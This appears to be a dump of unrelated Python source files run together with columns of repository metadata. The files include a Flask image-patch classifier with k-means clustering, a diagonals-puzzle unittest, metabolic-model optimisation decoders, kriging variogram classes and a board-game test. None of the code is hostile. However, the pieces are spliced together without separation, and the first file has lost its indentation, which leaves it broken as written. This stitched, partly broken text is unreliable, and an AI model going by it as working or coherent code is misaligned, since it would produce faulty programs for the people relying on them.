box_line.append(tfirer_brigade)
box_line.append(tfirer_unit)
for tdetail_no in distinct_detail_num_arr:
tdetail_data = get_a_line_for_box(session_detail, tarmy_no, tdetail_no)
for te in tdetail_data:
box_line.append(te)
table_box.append(box_line)
print("---------")
print(table_box)
print(distinct_detail_num_arr)
return render_template('pages/session_summary.html',session=s_arr,detail_no_f=distinct_detail_num_arr,box =table_box )
def get_a_line_for_box(qresult, army_no, detail_no):
new_line = []
found=False
for line in qresult:
if(line[2]==detail_no):
lano = line[0]
lname = line[1]
ldno = line[2]
lre = line[3]
lgl = line[4]
if lano == army_no:
new_line.append(lre)
new_line.append(lgl)
found=True
if(found == False):
new_line.append('N/A')
new_line.append('N/A')
return new_line
def predictAsMatrix(image,width,height):
step=25
i=0
resized_array =np.zeros(shape=(width//25,height//25))
while i<=height-25:
j=0
while j<=height-25:
patch = image.crop((i, j, i+25, j+25))
img1=np.array(patch)
image_data=color.rgb2gray(img1)
img_data=merge_datasets(image_data)
test_data = reformat(img_data)
patchp=patchIdentification(test_data)
resized_array[j//25][i//25]=patchp
j=j+step
i=i+step
return resized_array
def make_empty_string_if_needed(v):
if(v == "999" or v == "NA" or v == "None" or v is None):
return ""
return v
def merge_datasets(img1):
predict_dataset = make_arrays(1, 25, 25)
predict_dataset[0:1, :, :] = img1
return predict_dataset
def make_arrays(nb_rows, image_height, image_width):
if nb_rows:
dataset = np.ndarray((nb_rows, image_height, image_width), dtype=np.float32)
else:
dataset = None
return dataset
def reformat(dataset):
dataset = dataset.reshape((-1, 25*25)).astype(np.float32)
return dataset
def patchIdentification(data):
w1 = graph.get_tensor_by_name("tf_test_image:0")
feed_dict ={w1:data}
op_to_restore = graph.get_tensor_by_name("test_prediction_image:0")
predict= sess.run([op_to_restore],feed_dict=feed_dict)
array=predict[0][0]
if(array[0]>array[1]):
return 0
else :
return 1
class Graph:
def __init__(self, row, col, g):
self.ROW = row
self.COL = col
self.graph = g
def isSafe(self, i, j, visited):
return (i >= 0 and i < self.ROW and
j >= 0 and j < self.COL and
not visited[i][j] and self.graph[i][j])
def DFS(self, i, j, visited):
rowNbr = [-1, -1, -1, 0, 0, 1, 1, 1];
colNbr = [-1, 0, 1, -1, 1, -1, 0, 1];
visited[i][j] = True
for k in range(8):
if self.isSafe(i + rowNbr[k], j + colNbr[k], visited):
self.DFS(i + rowNbr[k], j + colNbr[k], visited)
def countIslands(self):
visited = [[False for j in range(self.COL)]for i in range(self.ROW)]
count = 0
for i in range(self.ROW):
for j in range(self.COL):
if visited[i][j] == False and self.graph[i][j] ==1:
self.DFS(i, j, visited)
count += 1
return count
def points(data,h,w):
i=0
while (i<h):
j=0
while (j<w):
if(data[i][j]==1):
pointsarray.append([i,j])
j=j+1
i=i+1
def kmean(N,pointsarray):
print("---------------------")
print("pointsarray")
print(pointsarray)
n=0
if (len(pointsarray)==0):
centroid = 0
else:
while (n<=100):
kmeans = KMeans(n_clusters=N, random_state=0).fit(pointsarray)
center=kmeans.cluster_centers_
centroid=((kmeans.cluster_centers_)*25)+12
n=n+1
return centroid
def mpi(N,pointsarray):
n=0
pointsarrayfiltered=[]
print('This is pointsarray')
print(pointsarray)
cen_int=[]
if(len(pointsarray)<=0):
cen_int=[[0,0]]
else:
while (n<=100):
kmeans = KMeans(n_clusters=N, random_state=0).fit(pointsarray)
center=kmeans.cluster_centers_
centroid=(kmeans.cluster_centers_)
cen_int = centroid.astype(int)
n=n+1
return cen_int
if __name__ == "__main__":
load_model()
app.run()
| 44.512666
| 566
| 0.471381
| 50,031
| 442,812
| 3.841318
| 0.014171
| 0.063439
| 0.057158
| 0.021745
| 0.923506
| 0.897687
| 0.868986
| 0.848797
| 0.831303
| 0.817769
| 0
| 0.034216
| 0.434047
| 442,812
| 9,948
| 567
| 44.512666
| 0.732649
| 0.003559
| 0
| 0.784938
| 0
| 0.000121
| 0.038095
| 0.017973
| 0.000121
| 0
| 0
| 0
| 0
| 1
| 0.020999
| false
| 0.000965
| 0.003983
| 0.004465
| 0.050447
| 0.035482
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
494a9ea9f182d3c767f141134195db9bec1dedd3
| 2,289
|
py
|
Python
|
src/tests/test_diagonals.py
|
victuxbb/DiagonalsPuzzle
|
807a2c797eef45b4edcb600c2f92f7cb70ee4b34
|
[
"MIT"
] | null | null | null |
src/tests/test_diagonals.py
|
victuxbb/DiagonalsPuzzle
|
807a2c797eef45b4edcb600c2f92f7cb70ee4b34
|
[
"MIT"
] | null | null | null |
src/tests/test_diagonals.py
|
victuxbb/DiagonalsPuzzle
|
807a2c797eef45b4edcb600c2f92f7cb70ee4b34
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from src.com.victuxbb.diagonals.diagonals import Diagonals
class TestDiagonals(TestCase):
@classmethod
def setUpClass(cls):
cls._diagonals = Diagonals(size=3, diagonals=6)
def test_given_BL_TR_with_left_cell_diagonal_error_it_should_return_false(self):
given_permutation = [2, 2, 2, 1, -1, -1, -1, -1, -1]
self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=given_permutation, last_inserted=3))
def test_given_BL_TR_with_bottom_left_cell_diagonal_error_it_should_return_false(self):
given_permutation = [2, 2, 2, 0, 1, -1, -1, -1, -1]
self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=given_permutation, last_inserted=4))
def test_given_BL_TR_with_bottom_cell_diagonal_error_it_should_return_false(self):
given_permutation = [2, 1, -1, -1, 1, -1, -1, -1, -1]
self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=given_permutation, last_inserted=1))
def test_given_BR_TL_with_left_cell_diagonal_error_it_should_return_false(self):
given_permutation = [1, 1, 1, 1, 2, -1, -1, -1, -1]
self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=given_permutation, last_inserted=4))
def test_given_BR_TL_with_bottom_cell_diagonal_error_it_should_return_false(self):
given_permutation = [1, 2, -1, -1, -1, -1, -1, -1, -1]
self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=given_permutation, last_inserted=1))
def test_given_BR_TL_with_top_left_cell_diagonal_error_it_should_return_false(self):
given_permutation = [0, 2, 2, 1, 2, -1, -1, -1, -1]
self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=given_permutation, last_inserted=4))
def test_given_number_of_cells_not_processed_it_should_not_try_to_extend(self):
given_permutation = [1, 0, 0, 0, 0, -1, -1, -1, -1]
self.assertFalse(self._diagonals.can_be_extended_to_solution(perm=given_permutation, last_inserted=4))
def test_given_number_of_cells_not_processed_it_should_try_to_extend(self):
given_permutation = [1, 1, 1, 0, 0, 0, 1, -1, -1]
self.assertTrue(self._diagonals.can_be_extended_to_solution(perm=given_permutation, last_inserted=6))
| 54.5
| 110
| 0.750983
| 355
| 2,289
| 4.385915
| 0.160563
| 0.048812
| 0.05395
| 0.046243
| 0.876686
| 0.876044
| 0.854849
| 0.794477
| 0.793192
| 0.793192
| 0
| 0.04173
| 0.141547
| 2,289
| 41
| 111
| 55.829268
| 0.750636
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 1
| 0.3
| false
| 0
| 0.066667
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
494dd9017df26b3ac0115e4a66eb0c332b81ab84
| 54
|
py
|
Python
|
homeworks/aleksey_gukov/hw05/level01.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | null | null | null |
homeworks/aleksey_gukov/hw05/level01.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | 8
|
2019-11-15T18:15:56.000Z
|
2020-02-03T18:05:05.000Z
|
homeworks/nikita_marchenkov/hw05/level01.py
|
tgrx/Z22
|
b2539682ff26c8b6d9f63a7670c8a9c6b614a8ff
|
[
"Apache-2.0"
] | null | null | null |
def summa(name_a, name_b):
return name_a + name_b
| 18
| 26
| 0.703704
| 11
| 54
| 3.090909
| 0.545455
| 0.294118
| 0.529412
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.203704
| 54
| 2
| 27
| 27
| 0.790698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
498fbbf67b7f4e7ab502ebcb370524198d755cfd
| 216
|
py
|
Python
|
fastface/utils/__init__.py
|
mdornseif/fastface
|
72772db1fae4af17e829cd5479c4848fe5eb8948
|
[
"MIT"
] | 72
|
2021-01-03T05:43:56.000Z
|
2021-09-17T06:09:35.000Z
|
fastface/utils/__init__.py
|
mdornseif/fastface
|
72772db1fae4af17e829cd5479c4848fe5eb8948
|
[
"MIT"
] | 3
|
2021-09-23T22:26:57.000Z
|
2021-10-31T10:11:48.000Z
|
fastface/utils/__init__.py
|
mdornseif/fastface
|
72772db1fae4af17e829cd5479c4848fe5eb8948
|
[
"MIT"
] | 6
|
2021-02-15T19:58:57.000Z
|
2021-08-19T12:46:41.000Z
|
from . import box, cache, cluster, config, geo, kernel, preprocess, random, vis
__all__ = [
"box",
"cache",
"cluster",
"config",
"geo",
"kernel",
"preprocess",
"random",
"vis",
]
| 15.428571
| 79
| 0.532407
| 21
| 216
| 5.285714
| 0.571429
| 0.144144
| 0.27027
| 0.378378
| 0.882883
| 0.882883
| 0.882883
| 0.882883
| 0.882883
| 0
| 0
| 0
| 0.287037
| 216
| 13
| 80
| 16.615385
| 0.720779
| 0
| 0
| 0
| 0
| 0
| 0.226852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b8cf4dcffa8289a56dbf81174f41023163bb024d
| 436
|
py
|
Python
|
wrappers/serial/visibility/iterators.py
|
ChrisHad/algorithm-reference-library
|
bded1b62ea801ea4f4f5bd0794c18cd81d4b2810
|
[
"Apache-2.0"
] | 22
|
2016-12-14T11:20:07.000Z
|
2021-08-13T15:23:41.000Z
|
wrappers/serial/visibility/iterators.py
|
ChrisHad/algorithm-reference-library
|
bded1b62ea801ea4f4f5bd0794c18cd81d4b2810
|
[
"Apache-2.0"
] | 30
|
2017-06-27T09:15:38.000Z
|
2020-09-11T18:16:37.000Z
|
wrappers/serial/visibility/iterators.py
|
ChrisHad/algorithm-reference-library
|
bded1b62ea801ea4f4f5bd0794c18cd81d4b2810
|
[
"Apache-2.0"
] | 20
|
2017-07-02T03:45:49.000Z
|
2019-12-11T17:19:01.000Z
|
""" Visibility iterators for iterating through a BlockVisibility or Visibility.
"""
from processing_components.visibility.iterators import vis_null_iter
from processing_components.visibility.iterators import vis_timeslice_iter
from processing_components.visibility.iterators import vis_timeslices
from processing_components.visibility.iterators import vis_wslices
from processing_components.visibility.iterators import vis_wslice_iter
| 48.444444
| 79
| 0.887615
| 52
| 436
| 7.192308
| 0.365385
| 0.304813
| 0.320856
| 0.454545
| 0.716578
| 0.716578
| 0.716578
| 0.299465
| 0
| 0
| 0
| 0
| 0.073395
| 436
| 8
| 80
| 54.5
| 0.925743
| 0.172018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
770df31c38181a699d81959b07f94446f824d818
| 15,563
|
py
|
Python
|
src/optimModels/optimization/decoders.py
|
BioSystemsUM/optimModels
|
41e8ec5e99a66052fc8b547b60f979d2a2fd669d
|
[
"Apache-2.0"
] | 1
|
2020-01-09T08:58:05.000Z
|
2020-01-09T08:58:05.000Z
|
src/optimModels/optimization/decoders.py
|
BioSystemsUM/optimModels
|
41e8ec5e99a66052fc8b547b60f979d2a2fd669d
|
[
"Apache-2.0"
] | null | null | null |
src/optimModels/optimization/decoders.py
|
BioSystemsUM/optimModels
|
41e8ec5e99a66052fc8b547b60f979d2a2fd669d
|
[
"Apache-2.0"
] | 2
|
2020-01-16T16:15:28.000Z
|
2020-01-21T16:31:20.000Z
|
from abc import ABCMeta, abstractmethod
from collections import OrderedDict
from optimModels.simulation.simul_problems import KineticSimulationProblem, StoicSimulationProblem, GeckoSimulationProblem
from optimModels.simulation.override_simul_problem import OverrideKineticSimulProblem, OverrideStoicSimulProblem
from optimModels.utils.configurations import StoicConfigurations
class Decoder:
"""
Abstract class with the abstract methods that must be implemented by all decoders.
"""
__metaclass__ = ABCMeta
@abstractmethod
def get_override_simul_problem(self, candidate, simulProblem):
pass
@abstractmethod
def decode_candidate(self, candidate):
pass
def __getstate__(self):
state = self.__dict__.copy()
return state
def __setstate__(self, state):
self.__dict__.update(state)
class DecoderMediumLevels(Decoder):
def __init__(self, ids, levels):
self.ids = ids
self.levels = levels
def decode_candidate(self, candidate):
"""
Convert the map of type *{parameterIndex : levelIndex}* to a map of type *{parameterId: levelOfExpression}*
Args:
candidate (dict): The key is the parameter index and the value is the level of expression index.
Returns: A dictionary where the key is the parameter id and the value is the level of expression with values between
0 and 1 to represent under expression or higher that 1 to represent the over expression.
"""
result = {self.ids[k]: self.levels[v] for (k, v) in list(candidate)}
return result
def decode_candidate_ids_to_index(self, identifiers):
""" Convert the list of tupples of identifiers into a list of tuples of integers (indexes).
Args:
identifiers (list): List of tuples whit the parameters and levels ids
Returns: List of tuples indexes of parameters.
"""
result = [(self.ids.index(x), self.levels.index(y)) for x, y in identifiers.items()]
return result
def get_override_simul_problem(self, candidate, simulProblem):
"""
Function to create a instance of OverrideSimulationProblem based on the candidate given by argument.
Args:
candidate (list): candidate to decode
simulProblem: Simulation problem instance.
Returns: OverrideStoicSimulProblem instance
"""
uptake = self.decode_candidate(candidate)
drains = [r for r in simulProblem.get_drains() if r not in simulProblem.get_constraints_reacs() and r not in simulProblem.objective.keys()]
if isinstance(simulProblem, StoicSimulationProblem):
# close all drains to uptake and open only the reaction in candidate
constraints = {}
for rId in drains:
if rId in uptake.keys():
constraints[rId] = (-1* uptake[rId],0)
else:
constraints[rId] = (0, StoicConfigurations.DEFAULT_UB)
override = OverrideStoicSimulProblem(constraints=constraints)
else:
raise Exception ("Unknown simulation problem type by DecoderMedium.")
return override
class DecoderMediumReacKO(Decoder):
def __init__(self, idsDrains, idsReactions):
self.drains = idsDrains
self.reactions = idsReactions
def decode_candidate(self, candidate):
"""
Convert the list of index into a list of identifiers.
Args:
candidate(list): list of indexes of parameters
Returns: list of parameters ids.
"""
drains = [self.drains[x] for x in list(candidate[0])]
ko = [self.reactions[x] for x in list(candidate[1])]
return drains, ko
def decode_candidate_ids_to_index(self, identifiers):
"""
Convert the list of identifiers into a list of integers (indexes).
Args:
identifiers (list): parameters identifiers
Returns: List of parameters indexes.
"""
indexDrains = [self.drains.index(x) for x in identifiers[0]]
indexKO =[self.reactions.index(x) for x in identifiers[1]]
return indexDrains, indexKO
def get_override_simul_problem(self, candidate, simulProblem):
"""
Build the override simulation problem which will contains the modifications that must be applied to the model in order to simulate the drains that will be open for uptake and KO reactions.
Args:
candidate (list): indexes of reactions that will be open (drains) or the flux will be 0 (internal reactions).
simulProblem (SimulationProblem): all information required to perform a model simulation.
Returns: OverrideSimulProblem instance with the modifications to be applied over the simulation Problem.
"""
uptake, koReactions = self.decode_candidate(candidate)
if isinstance(simulProblem, StoicSimulationProblem):
# close all drains to uptake and open only the reaction in candidate
constraints = {reacId:(0, 0) for reacId in koReactions}
for rId in self.drains:
if rId in uptake:
constraints[rId] = (StoicConfigurations.DEFAULT_LB,0)
else:
constraints[rId] = (0, StoicConfigurations.DEFAULT_UB)
override = OverrideStoicSimulProblem(constraints=constraints)
else:
raise Exception ("Unknown simulation problem type by DecoderMediumReacKO.")
return override
class DecoderMedium(Decoder):
def __init__(self, ids):
self.ids = ids
def decode_candidate(self, candidate):
""" Convert the list of indexes into a list of identifiers.
Args:
candidate (list): indexes of parameters.
Returns: list of parameters identifiers.
"""
result = [self.ids[x] for x in list(candidate)]
return result
def decode_candidate_ids_to_index(self, identifiers):
"""
Convert the list of identifiers into a list of integers (indexes).
Args:
identifiers (list): Ids of parameters
Returns: List of integers (parameters indexes)
"""
result = [self.ids.index(x) for x in identifiers]
return result
def get_override_simul_problem(self, candidate, simulProblem):
""" Build the override simulation problem which will contains the modifications that must be applied to the model in order to simulate the drains that will be open for uptake.
Args:
candidate (list): indexes of reactions that will be open (drains).
simulProblem (SimulationProblem): all information required to perform a model simulation.
Returns: OverrideSimulProblem instance with the modifications to be applied over the simulation Problem.
"""
uptake = self.decode_candidate(candidate)
#drains = [r for r in simulProblem.get_drains() if r not in simulProblem.get_constraints_reacs()]
if isinstance(simulProblem, StoicSimulationProblem):
# close all drains to uptake and open only the reaction in candidate
constraints = {}
for rId in self.ids:
if rId in uptake:
constraints[rId] = (StoicConfigurations.DEFAULT_LB,0)
else:
constraints[rId] = (0, StoicConfigurations.DEFAULT_UB)
override = OverrideStoicSimulProblem(constraints=constraints)
else:
raise Exception ("Unknown simulation problem type by DecoderMedium.")
return override
class DecoderReacKnockouts(Decoder):
def __init__(self, ids):
self.ids = ids
def decode_candidate(self, candidate):
""" Convert the list of indexes into a list of identifiers.
Args:
candidate (list): indexes of parameters/reactions.
Returns: list of parameters/reactions identifiers.
"""
result = [self.ids[x] for x in list(candidate)]
return result
def decode_candidate_ids_to_index(self, identifiers):
"""
Convert the list of identifiers into a list of integers (indexes).
Args:
identifiers (list): Ids of parameters/reactions
Returns: List of integers (parameters indexes)
"""
result = [self.ids.index(x) for x in identifiers]
return result
def get_override_simul_problem(self, candidate, simulProblem):
""" Build the override simulation problem which will contains the modifications that must be applied to the model in order to simulate the reactions knockouts.
Args:
candidate (list): indexes of reactions.
simulProblem (SimulationProblem): all information required to perform a model simulation.
Returns: OverrideSimulProblem instance with the modifications to be applied over the simulation Problem.
"""
ko = self.decode_candidate(candidate)
if isinstance(simulProblem, KineticSimulationProblem):
factors = OrderedDict([(r_id, 0) for r_id in ko])
override = OverrideKineticSimulProblem(factors=factors)
elif isinstance(simulProblem, StoicSimulationProblem):
constraints = {reacId:(0, 0) for reacId in ko}
override = OverrideStoicSimulProblem(constraints=constraints)
else:
raise Exception ("Unknown simulation problem type by DecoderReacKnockouts.")
return override
class DecoderReacUnderOverExpression(Decoder):
def __init__(self, ids, levels):
self.ids = ids
self.levels = levels
def decode_candidate(self, candidate):
"""
Convert the map of type *{parameterIndex : levelIndex}* to a map of type *{parameterId: levelOfExpression}*
Args:
candidate (dict): The key is the parameter index and the value is the level of expression index.
Returns: A dictionary where the key is the parameter id and the value is the level of expression with values between
0 and 1 to represent under expression or higher that 1 to represent the over expression.
"""
result = {self.ids[k]: self.levels[v] for (k, v) in list(candidate)}
return result
def decode_candidate_ids_to_index(self, identifiers):
""" Convert the list of tuples of identifiers into a list of tuples of integers (indexes).
Args:
identifiers (list): List of tuples whit the parameters and levels ids
Returns: List of tuples indexes of reactions.
"""
result = [(self.ids.index(x), self.levels.index(y)) for x, y in identifiers.items()]
return result
def get_override_simul_problem(self, candidate, simulProblem):
""" Build the override simulation problem which will contains the modifications that must be applied to the model in order to simulate the under/over enzymes expression.
Args:
candidate (dict): candidate represented using reactions and levels indexes.
simulProblem (SimulationProblem): all information required to perform a model simulation.
Returns: OverrideSimulProblem instance with the modifications to be applied over the simulation Problem.
"""
if isinstance(simulProblem, KineticSimulationProblem):
solDecoded = self.decode_candidate(candidate)
override = OverrideKineticSimulProblem(factors=solDecoded)
return override
else:
raise Exception ("Unknown simulation problem type by decoderUnderOverExpression")
class DecoderProtKnockouts(Decoder):
def __init__(self, ids):
self.ids = ids
def decode_candidate(self, candidate):
""" Convert the list of indexes into a list of identifiers.
Args:
candidate (list): indexes of parameters.
Returns: list of parameters identifiers.
"""
result = [self.ids[x] for x in list(candidate)]
return result
def decode_candidate_ids_to_index(self, identifiers):
"""
Convert the list of identifiers into a list of integers (indexes).
Args:
identifiers (list): Ids of proteins
Returns: List of integers (proteins indexes)
"""
result = [self.ids.index(x) for x in identifiers]
return result
def get_override_simul_problem(self, candidate, simulProblem):
""" Build the override simulation problem which will contains the modifications that must be applied to the model in order to simulate the protein knockouts.
Args:
candidate (list): indexes of proteins.
simulProblem (SimulationProblem): all information required to perform a model simulation.
Returns: OverrideSimulProblem instance with the modifications to be applied over the simulation Problem.
"""
ko = ["draw_prot_"+ p for p in self.decode_candidate(candidate)]
if isinstance(simulProblem, GeckoSimulationProblem):
constraints = {reacId:(0, 0) for reacId in ko}
override = OverrideStoicSimulProblem(constraints=constraints)
else:
raise Exception ("Unknown simulation problem type by DecoderProtKnockouts.")
return override
class DecoderProtUnderOverExpression(Decoder):
def __init__(self, ids, levels):
self.ids = ids
self.levels = levels
def decode_candidate(self, candidate):
"""
Convert the map of type *{proteinIndex : levelIndex}* to a map of type *{proteinId: levelOfExpression}*
Args:
candidate (dict): The key is the parameter index and the value is the level of expression index.
Returns: A dictionary where the key is the protein id and the value is the level of expression with values between
0 and 1 to represent under expression or higher that 1 to represent the over expression.
"""
result = {self.ids[k]: (0,self.levels[v]) for (k, v) in list(candidate)}
return result
def decode_candidate_ids_to_index(self, identifiers):
""" Convert the list of tupples of identifiers into a list of tuples of integers (indexes).
Args:
identifiers (list): List of tuples whit the proteins and levels ids
Returns: List of tuples indexes.
"""
result = [(self.ids.index(x), self.levels.index(y)) for x, y in identifiers.items()]
return result
def get_override_simul_problem(self, candidate, simulProblem):
""" Build the override simulation problem which will contains the modifications that must be applied to the model in order to simulate the under/over proteins expression.
Args:
candidate (dict): candidate represented using proteins and levels indexes.
simulProblem (SimulationProblem): all information required to perform a model simulation.
Returns: OverrideSimulProblem instance with the modifications to be applied over the simulation Problem.
"""
if isinstance(simulProblem, GeckoSimulationProblem):
solDecoded = self.decode_candidate(candidate)
constraints = {"draw_prot"+k: v for k,v in solDecoded.items()}
override = OverrideStoicSimulProblem(constraints=constraints)
else:
raise Exception ("Unknown simulation problem type by decoderUnderOverExpression")
return override
| 40.21447
| 196
| 0.667031
| 1,771
| 15,563
| 5.785997
| 0.099944
| 0.021665
| 0.026349
| 0.017176
| 0.809017
| 0.795355
| 0.774959
| 0.745974
| 0.733483
| 0.719137
| 0
| 0.002541
| 0.266594
| 15,563
| 386
| 197
| 40.318653
| 0.895216
| 0.416372
| 0
| 0.708075
| 0
| 0
| 0.05026
| 0.011637
| 0
| 0
| 0
| 0
| 0
| 1
| 0.198758
| false
| 0.012422
| 0.031056
| 0
| 0.42236
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
770ebd1539c075f7666098635e796af66dfb3791
| 3,473
|
py
|
Python
|
src/fast_krig/models.py
|
tim-a-davis/fast_krig
|
633773423ca5a8a93c2e28106d7822e661da8338
|
[
"MIT"
] | null | null | null |
src/fast_krig/models.py
|
tim-a-davis/fast_krig
|
633773423ca5a8a93c2e28106d7822e661da8338
|
[
"MIT"
] | null | null | null |
src/fast_krig/models.py
|
tim-a-davis/fast_krig
|
633773423ca5a8a93c2e28106d7822e661da8338
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy.optimize import curve_fit
import functools
import fast_krig as fk
class Exponential:
"""This class implements the Exponential semi-variogram model"""
def __init__(self, krig_range: float = None, sill: float = None):
"""The initialization of the variogram model only requires a range and sill.
Args:
krig_range (float, optional): The max range of the model. Defaults to None.
sill (float, optional): The max variance of the model. Defaults to None.
"""
self.range = krig_range
self.sill = sill
def autofit(self, dist, vals):
"""Autofits the variogram parameters to the experimental data.
Args:
dist (np.ndarray): The distance matrix on which to fit.
vals (np.ndarray): The associated values for the distance array.
Raises:
Exception: [description]
"""
if self.range and self.sill:
return
if not self.sill:
self.sill = vals.mean()
func = functools.partial(self.variogram, self.sill)
popt, pcov = curve_fit(func, dist, vals, p0=(dist.mean()))
if np.isinf(pcov.squeeze()):
raise Exception("Bad auto fit")
self.range = popt[0]
@staticmethod
def variogram(sill, dist, krig_range):
"""Static method to calculate exponential model
Args:
sill (float): The maximum variance of the model.
dist (np.ndarray): The distance matrix.
krig_range (float): The maximum range of the model.
Returns:
np.array: The exponential output from the model inputs.
"""
return sill * (1 - np.exp(-dist / krig_range))
def __call__(self, dist):
return self.variogram(self.sill, dist, self.range)
class Gaussian:
def __init__(self, krig_range: float = None, sill: float = None):
"""The initialization of this variogram model only requires a range and sill.
Args:
krig_range (float, optional): The max range of the model. Defaults to None.
sill (float, optional): The max variance of the model. Defaults to None.
"""
self.range = krig_range
self.sill = sill
def autofit(self, dist, vals):
"""Autofits the variogram parameters to the spherical data.
Args:
dist (np.ndarray): The distance matrix on which to fit.
vals (np.ndarray): The associated values for the distance array.
Raises:
Exception: [description]
"""
if not self.sill:
self.sill = vals.mean()
func = functools.partial(self.variogram, self.sill)
popt, pcov = curve_fit(func, dist, vals, p0=(dist.mean()))
if np.isinf(pcov.squeeze()):
raise Exception("Bad auto fit")
self.range = popt[0]
@staticmethod
def variogram(sill, dist, krig_range):
"""Static method to calculate spherical model
Args:
sill (float): The maximum variance of the model.
dist (np.ndarray): The distance matrix.
krig_range (float): The maximum range of the model.
Returns:
np.array: The spherical output from the model inputs.
"""
return sill * (1 - np.exp(-np.square(dist) / np.square(krig_range)))
def __call__(self, dist):
return self.variogram(self.sill, dist, self.range)
| 33.718447
| 87
| 0.605528
| 436
| 3,473
| 4.75
| 0.201835
| 0.052149
| 0.038629
| 0.036697
| 0.866248
| 0.866248
| 0.866248
| 0.866248
| 0.866248
| 0.866248
| 0
| 0.002473
| 0.301468
| 3,473
| 102
| 88
| 34.04902
| 0.851195
| 0.445724
| 0
| 0.75
| 0
| 0
| 0.014898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.1
| 0.05
| 0.475
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6278f33b0cf6f57aa036823bf2b42713b3bd316e
| 10,168
|
py
|
Python
|
z2/part2/interactive/jm/random_fuzzy_arrows_1/835134250.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 1
|
2020-04-16T12:13:47.000Z
|
2020-04-16T12:13:47.000Z
|
z2/part2/interactive/jm/random_fuzzy_arrows_1/835134250.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:50:15.000Z
|
2020-05-19T14:58:30.000Z
|
z2/part2/interactive/jm/random_fuzzy_arrows_1/835134250.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:45:13.000Z
|
2020-06-09T19:18:31.000Z
|
from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 835134250
"""
"""
random actions, total chaos
"""
board = gamma_new(8, 7, 5, 13)
assert board is not None
assert gamma_move(board, 1, 4, 1) == 1
assert gamma_move(board, 2, 6, 2) == 1
assert gamma_move(board, 2, 4, 2) == 1
assert gamma_free_fields(board, 2) == 53
assert gamma_move(board, 3, 3, 5) == 1
assert gamma_move(board, 3, 2, 1) == 1
assert gamma_busy_fields(board, 4) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 2, 0) == 1
assert gamma_move(board, 5, 4, 3) == 1
assert gamma_move(board, 1, 3, 4) == 1
assert gamma_move(board, 2, 3, 6) == 1
assert gamma_move(board, 3, 4, 4) == 1
assert gamma_move(board, 3, 3, 3) == 1
assert gamma_golden_move(board, 3, 2, 4) == 0
